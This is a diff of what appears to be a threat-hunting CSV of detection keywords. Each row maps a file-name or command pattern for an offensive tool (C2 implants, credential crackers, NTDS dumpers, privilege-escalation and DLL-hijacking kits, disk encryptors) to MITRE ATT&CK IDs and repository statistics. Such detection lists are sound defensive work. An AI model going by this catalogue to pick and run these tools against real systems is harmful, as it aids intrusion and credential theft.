 "*das add -db dbname masscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -9091,21 +9239,21 @@
 "*das report -hosts 192.168.1.0/24 -oA report2*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*das scan -db dbname -ports 22*80*443*445 -show*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*data/payloads/stager.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z"
-"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
-"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
 "*data/wordlist_256.txt*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
-"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Data\VulnerableCOM.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
-"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","670","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z"
+"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","669","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z"
 "*datr=80ZzUfKqDOjwL8pauwqMjHTa*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A"
 "*DavidXanatos/DiskCryptor*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
-"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z"
-"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z"
-"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*dazzleUP.cna*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.sln*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" 
@@ -9114,8 +9262,8 @@ "*dazzleUP.x64.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP_Reflective_DLL*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP-master*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" -"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DBC2.git*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.cs*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" 
@@ -9126,28 +9274,28 @@ "*dbc2LoaderWrapperCLR_x64.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x86.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*DBC2-master.zip*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*dccon.exe -encrypt2*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" 
"*dcenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*dchrastil*","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" +"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" "*dcipher-cli*","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. 
right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","224","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" -"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" -"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" -"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - 